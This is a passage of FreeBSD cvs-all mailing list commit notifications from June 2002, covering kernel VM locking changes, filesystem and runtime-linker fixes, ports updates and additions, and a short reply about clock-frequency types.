22 Jun 2002 10:47:12 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MHlCu91078; Sat, 22 Jun 2002 10:47:12 -0700 (PDT) (envelope-from alc) Message-Id: <200206221747.g5MHlCu91078@freefall.freebsd.org> From: Alan Cox Date: Sat, 22 Jun 2002 10:47:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_map.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/22 10:47:12 PDT Modified files: sys/vm vm_map.c Log: o In vm_map_insert(), replace GIANT_REQUIRED by the acquisition and release of Giant around the direct manipulation of the vm_object and the optional call to pmap_object_init_pt(). o In vm_map_findspace(), remove GIANT_REQUIRED. Instead, acquire and release Giant around the occasional call to pmap_growkernel(). o In vm_map_find(), remove GIANT_REQUIRED. Revision Changes Path 1.257 +6 -5 src/sys/vm/vm_map.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10:49: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7130F37B408; Sat, 22 Jun 2002 10:48:46 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MHmkI91156; Sat, 22 Jun 2002 10:48:46 -0700 (PDT) (envelope-from pat) Message-Id: <200206221748.g5MHmkI91156@freefall.freebsd.org> From: Patrick Li Date: Sat, 22 Jun 2002 10:48:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache13-modssl Makefile pkg-deinstall pkg-plist ports/www/apache13-modssl/files patch-ab X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/22 10:48:46 PDT Modified files: www/apache13-modssl Makefile pkg-plist www/apache13-modssl/files patch-ab Removed files: www/apache13-modssl pkg-deinstall Log: - Sync with www/apache13 a bit - Fix clobbering ${PREFIX}/www on install and warnings coughing up on deinstall when ${PREFIX}/www is not empty - Remove pkg-deinstall PR: ports/39645, ports/36804 Submitted by: Charles Sprickman , Peter C. Lai Revision Changes Path 1.103 +2 -1 ports/www/apache13-modssl/Makefile 1.4 +41 -30 ports/www/apache13-modssl/files/patch-ab 1.3 +0 -15 ports/www/apache13-modssl/pkg-deinstall (dead) 1.30 +47 -46 ports/www/apache13-modssl/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 10:59:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4A38537B401; Sat, 22 Jun 2002 10:59:13 -0700 (PDT) Received: (from vanilla@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MHxC592295; Sat, 22 Jun 2002 10:59:12 -0700 (PDT) (envelope-from vanilla) Message-Id: <200206221759.g5MHxC592295@freefall.freebsd.org> From: "Vanilla I. Shu" Date: Sat, 22 Jun 2002 10:59:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/irc/irssi Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG vanilla 2002/06/22 10:59:12 PDT Modified files: irc/irssi Makefile distinfo Log: Upgrade to 0.8.5 to fix DoS. PR: ports/39567 Submitted by: "Sergey A.Osokin" Revision Changes Path 1.59 +1 -1 ports/irc/irssi/Makefile 1.39 +1 -1 ports/irc/irssi/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 11: 7:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2148037B407; Sat, 22 Jun 2002 11:07:06 -0700 (PDT) Received: (from mux@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MI76497358; Sat, 22 Jun 2002 11:07:06 -0700 (PDT) (envelope-from mux) Message-Id: <200206221807.g5MI76497358@freefall.freebsd.org> From: Maxime Henrion Date: Sat, 22 Jun 2002 11:07:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/kern vfs_syscalls.c src/sys/sys mount.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mux 2002/06/22 11:07:05 PDT Modified files: sys/kern vfs_syscalls.c sys/sys mount.h Log: o Remove the initialization of unused fields in the struct uio now that we don't use uiomove() anymore. o Enforce stricter checks on the length of the iov's in nmount(2) since we now malloc() them individually and corrupted iov's could make the kernel crash in malloc() with "kmem_map too small". Reviewed by: phk Revision Changes Path 1.261 +5 -25 src/sys/kern/vfs_syscalls.c 1.129 +1 -0 src/sys/sys/mount.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 11: 8: 8 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0487F37B403; Sat, 22 Jun 2002 11:08:05 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MI84f97451; Sat, 22 Jun 2002 11:08:04 -0700 (PDT) (envelope-from dillon) Message-Id: <200206221808.g5MI84f97451@freefall.freebsd.org> From: Matt Dillon Date: Sat, 22 Jun 2002 11:08:04 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/ufs/ufs ufs_readwrite.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/22 11:08:04 PDT Modified files: (Branch: RELENG_4) sys/ufs/ufs ufs_readwrite.c Log: MFC 1.90. Fix a major performance issue that was introduced in late 2000. Setting B_CLRBUF for the BALLOC call unexpectedly caused BALLOC to issue a read-before-write for each fs block, resulting in a huge (4x) performance penalty due to extra I/Os and lack of clustering. This workaround avoids the unnecessary read resulting in full write clustering performance to media. It is expected to have major visible effects only on large news systems (e.g. INN cyclic buffers), and databases, especially on hardware RAID systems (10x), and has already been shown to have a huge positive effect on INN. Most other programs use write-append which is already optimal. This patch does not fix the double-memory-copy to the filesystem buffer. That is a more difficult problem and is being worked on as a separate issue. Reviewed by: mckusick, tegge Revision Changes Path 1.65.2.11 +11 -7 src/sys/ufs/ufs/ufs_readwrite.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 11:10:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D27AF37B400; Sat, 22 Jun 2002 11:10:18 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MIAIC97748; Sat, 22 Jun 2002 11:10:18 -0700 (PDT) (envelope-from pat) Message-Id: <200206221810.g5MIAIC97748@freefall.freebsd.org> From: Patrick Li Date: Sat, 22 Jun 2002 11:10:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/pdftohtml Makefile distinfo ports/textproc/pdftohtml/files patch-aconf.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/22 11:10:18 PDT Modified files: textproc/pdftohtml Makefile distinfo Added files: textproc/pdftohtml/files patch-aconf.h Log: Keep checksum current: author rerolled distfile and the only change is to not define HAVE_MKSTEMPS by default. Add a patch to define HAVE_MKSTEMPS since we have it in our implementation. PR: ports/39582 Submitted by: maintainer Revision Changes Path 1.7 +1 -1 ports/textproc/pdftohtml/Makefile 1.5 +1 -1 ports/textproc/pdftohtml/distinfo 1.1 +11 -0 ports/textproc/pdftohtml/files/patch-aconf.h (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 11:16:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 04F0137B404; Sat, 22 Jun 2002 11:16:25 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MIGO698788; Sat, 22 Jun 2002 11:16:24 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206221816.g5MIGO698788@freefall.freebsd.org> From: Juli Mallett Date: Sat, 22 Jun 2002 11:16:24 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/i386/conf Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/22 11:16:24 PDT Modified files: sys/i386/conf Makefile Log: Use rm -f in the clean target, as seems to be common practice, and also avoids errors if no LINT exists. Submitted by: dwcjr Revision Changes Path 1.6 +1 -1 src/sys/i386/conf/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 11:32:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E4D2E37B401; Sat, 22 Jun 2002 11:32:15 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MIWFD00735; Sat, 22 Jun 2002 11:32:15 -0700 (PDT) (envelope-from dillon) Message-Id: <200206221832.g5MIWFD00735@freefall.freebsd.org> From: Matt Dillon Date: Sat, 22 Jun 2002 11:32:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/libexec/rtld-elf/alpha reloc.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/22 11:32:15 PDT Modified files: (Branch: RELENG_4) libexec/rtld-elf/alpha reloc.c Log: MFC 1.16 (alpha alloca -> mmap fix) Reviewed by: obrien Approved by: jdp Revision Changes Path 1.10.2.4 +17 -5 src/libexec/rtld-elf/alpha/reloc.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 11:36:27 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E41B537B404; Sat, 22 Jun 2002 11:36:21 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MIaLK01044; Sat, 22 Jun 2002 11:36:21 -0700 (PDT) (envelope-from dillon) Message-Id: <200206221836.g5MIaLK01044@freefall.freebsd.org> From: Matt Dillon Date: Sat, 22 Jun 2002 11:36:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/libexec/rtld-elf/ia64 reloc.c src/libexec/rtld-elf/sparc64 reloc.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/22 11:36:21 PDT Modified files: libexec/rtld-elf/ia64 reloc.c libexec/rtld-elf/sparc64 reloc.c Log: The last bits of the alloca -> mmap fix. IA64 and SPARC64 (current only). Untested (testing request went unanswered), but sparc64 is not expected to cause problems. IA64 is not expected to cause problems but the patch was slightly more complex so the possibility exists. Approved by: jdp Revision Changes Path 1.7 +43 -17 src/libexec/rtld-elf/ia64/reloc.c 1.2 +15 -4 src/libexec/rtld-elf/sparc64/reloc.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 11:36:55 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E831537B404; Sat, 22 Jun 2002 11:36:51 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MIapo01080; Sat, 22 Jun 2002 11:36:51 -0700 (PDT) (envelope-from alc) Message-Id: <200206221836.g5MIapo01080@freefall.freebsd.org> From: Alan Cox Date: Sat, 22 Jun 2002 11:36:51 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm device_pager.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/22 11:36:51 PDT Modified files: sys/vm device_pager.c Log: o Replace mtx_assert(&Giant, MA_OWNED) in dev_pager_alloc() with the acquisition and release of Giant. (Annotate as MPSAFE.) o Reorder the sanity checks in dev_pager_alloc() to reduce the time that Giant is held. Revision Changes Path 1.57 +17 -11 src/sys/vm/device_pager.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 11:37:22 2002 Delivered-To: cvs-all@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id 3167837B40E; Sat, 22 Jun 2002 11:37:08 -0700 (PDT) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id EAA25786; Sun, 23 Jun 2002 04:37:01 +1000 Date: Sun, 23 Jun 2002 04:42:01 +1000 (EST) From: Bruce Evans X-X-Sender: bde@gamplex.bde.org To: Mark Peek Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: src/sys/i386/isa clock.c In-Reply-To: <200206221630.g5MGUJH76448@freefall.freebsd.org> Message-ID: <20020623043726.K9398-100000@gamplex.bde.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sat, 22 Jun 2002, Mark Peek wrote: > mp 2002/06/22 09:30:19 PDT > > Modified files: > sys/i386/isa clock.c > Log: > Clock frequencies reported by sysctl should be unsigned values. Discovered > when machdep.tsc_freq returned a negative number on a 2.2GHz Xeon. Actually, they should be positive values. Signed types are useful for detection of overflow. "int profrate" in is also broken. It needs to hold any clock frequency. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 11:39:49 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2F88437B404; Sat, 22 Jun 2002 11:39:45 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MIdjf01354; Sat, 22 Jun 2002 11:39:45 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206221839.g5MIdjf01354@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 11:39:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www Makefile ports/www/xpath2rss Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 11:39:45 PDT Modified files: www Makefile Added files: www/xpath2rss Makefile distinfo pkg-comment pkg-descr pkg-plist Log: add xpath2rss 0.7 HTML to RSS converter Revision Changes Path 1.509 +1 -0 ports/www/Makefile 1.1 +30 -0 ports/www/xpath2rss/Makefile (new) 1.1 +1 -0 ports/www/xpath2rss/distinfo (new) 1.1 +1 -0 ports/www/xpath2rss/pkg-comment (new) 1.1 +4 -0 ports/www/xpath2rss/pkg-descr (new) 1.1 +5 -0 ports/www/xpath2rss/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 11:40: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E8DD537B407; Sat, 22 Jun 2002 11:39:46 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MIdk301385; Sat, 22 Jun 2002 11:39:46 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206221839.g5MIdk301385@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 11:39:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 11:39:46 PDT Modified files: . modules Log: xpath2rss --> ports/www/xpath2rss Revision Changes Path 1.5399 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 12: 2:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 30D7F37B406; Sat, 22 Jun 2002 12:02:10 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MJ2AI04112; Sat, 22 Jun 2002 12:02:10 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206221902.g5MJ2AI04112@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 12:02:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net Makefile ports/net/echolot Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 12:02:10 PDT Modified files: net Makefile Added files: net/echolot Makefile distinfo pkg-comment pkg-descr pkg-plist Log: add echolot 0.0.3 A packet sniffer that grabs ARP packets on any ethernet devices Revision Changes Path 1.790 +1 -0 ports/net/Makefile 1.1 +33 -0 ports/net/echolot/Makefile (new) 1.1 +1 -0 ports/net/echolot/distinfo (new) 1.1 +1 -0 ports/net/echolot/pkg-comment (new) 1.1 +6 -0 ports/net/echolot/pkg-descr (new) 1.1 +5 -0 ports/net/echolot/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 12: 2:43 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D7BD937B401; Sat, 22 Jun 2002 12:02:11 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MJ2Br04143; Sat, 22 Jun 2002 12:02:11 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206221902.g5MJ2Br04143@freefall.freebsd.org> From: Ying-Chieh Liao Date: Sat, 22 Jun 2002 12:02:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/22 12:02:11 PDT Modified files: . modules Log: echolot --> ports/net/echolot Revision Changes Path 1.5400 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 12: 8: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D669E37B404; Sat, 22 Jun 2002 12:08:07 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MJ87i08606; Sat, 22 Jun 2002 12:08:07 -0700 (PDT) (envelope-from pat) Message-Id: <200206221908.g5MJ87i08606@freefall.freebsd.org> From: Patrick Li Date: Sat, 22 Jun 2002 12:08:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/dictionary Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/22 12:08:07 PDT Modified files: textproc/dictionary Makefile distinfo Log: Update to 1.8.2 PR: 39651 Submitted by: maintainer Revision Changes Path 1.3 +1 -1 ports/textproc/dictionary/Makefile 1.3 +1 -1 ports/textproc/dictionary/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 12: 9:41 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2ADEC37B409; Sat, 22 Jun 2002 12:09:36 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MJ9aU08786; Sat, 22 Jun 2002 12:09:36 -0700 (PDT) (envelope-from dillon) Message-Id: <200206221909.g5MJ9aU08786@freefall.freebsd.org> From: Matt Dillon Date: Sat, 22 Jun 2002 12:09:36 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/kern vfs_bio.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/22 12:09:36 PDT Modified files: sys/kern vfs_bio.c Log: Fix a bug in vfs_bio_clrbuf(). The single-page-clrbuf optimization was improperly clearing more then just the invalid portions of the page. (This bug is not known to have been triggered by anything). Submitted by: tegge MFC after: 7 days Revision Changes Path 1.313 +10 -5 src/sys/kern/vfs_bio.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 12:14: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 96DE637B400; Sat, 22 Jun 2002 12:13:56 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MJDuI09547; Sat, 22 Jun 2002 12:13:56 -0700 (PDT) (envelope-from alc) Message-Id: <200206221913.g5MJDuI09547@freefall.freebsd.org> From: Alan Cox Date: Sat, 22 Jun 2002 12:13:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_mmap.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/22 12:13:56 PDT Modified files: sys/vm vm_mmap.c Log: o Reduce the scope of Giant in vm_mmap() to just the code that manipulates a vnode. (Thus, MAP_ANON and MAP_STACK never acquire Giant.) Revision Changes Path 1.147 +2 -4 src/sys/vm/vm_mmap.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 12:24: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F0A5037B401; Sat, 22 Jun 2002 12:23:57 -0700 (PDT) Received: (from imp@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MJNvc10569; Sat, 22 Jun 2002 12:23:57 -0700 (PDT) (envelope-from imp) Message-Id: <200206221923.g5MJNvc10569@freefall.freebsd.org> From: Warner Losh Date: Sat, 22 Jun 2002 12:23:57 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/i386/conf OLDCARD X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG imp 2002/06/22 12:23:57 PDT Added files: sys/i386/conf OLDCARD Log: OLDCARD version of GENERIC. Revision Changes Path 1.1 +243 -0 src/sys/i386/conf/OLDCARD (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 12:41:42 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 112CA37B401; Sat, 22 Jun 2002 12:41:38 -0700 (PDT) Received: (from joerg@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MJfbY12589; Sat, 22 Jun 2002 12:41:38 -0700 (PDT) (envelope-from joerg) Message-Id: <200206221941.g5MJfbY12589@freefall.freebsd.org> From: Joerg Wunsch Date: Sat, 22 Jun 2002 12:41:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics/p5-GD Makefile distinfo ports/graphics/p5-GD/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG joerg 2002/06/22 12:41:37 PDT Modified files: graphics/p5-GD Makefile distinfo graphics/p5-GD/files patch-aa Log: Update to 1.40. Revision Changes Path 1.26 +1 -1 ports/graphics/p5-GD/Makefile 1.10 +1 -1 ports/graphics/p5-GD/distinfo 1.7 +3 -3 ports/graphics/p5-GD/files/patch-aa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sat Jun 22 12:44:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 08BCF37B403; Sat, 22 Jun 2002 12:44:26 -0700 (PDT) Received: (from bsd@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5MJiPG12776; Sat, 22 Jun 2002 12:44:25 -0700 (PDT) (envelope-from bsd) Message-Id: <200206221944.g5MJiPG12776@freefall.freebsd.org> From: "Brian S. Dean" Date: Sat, 22 Jun 2002 12:44:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc rc.diskless2 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bsd 2002/06/22 12:44:25 PDT Modified files: etc rc.diskless2 Log: Create sendmail required directories if sendmail is enabled. Revision Changes Path 1.19 